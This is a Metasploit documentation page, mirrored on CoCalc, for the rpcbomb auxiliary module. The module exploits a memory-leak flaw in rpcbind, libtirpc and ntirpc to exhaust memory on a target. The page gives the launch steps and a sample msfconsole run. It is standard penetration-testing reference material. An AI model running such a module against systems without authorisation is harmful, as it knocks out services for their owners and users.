CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/dos/rpc/rpcbomb.md
Views: 1904

Vulnerable Application

This module exploits a vulnerability in rpcbind through 0.2.4, LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.

Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/dos/rpc/rpcbomb

  3. Do: set RHOSTS [IP]

  4. Do: run

  5. Target should leak memory

Scenarios

rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)

msf > use auxiliary/dos/rpc/rpcbomb msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7 RHOSTS => 10.0.2.7 msf auxiliary(rpcbomb) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(rpcbomb) >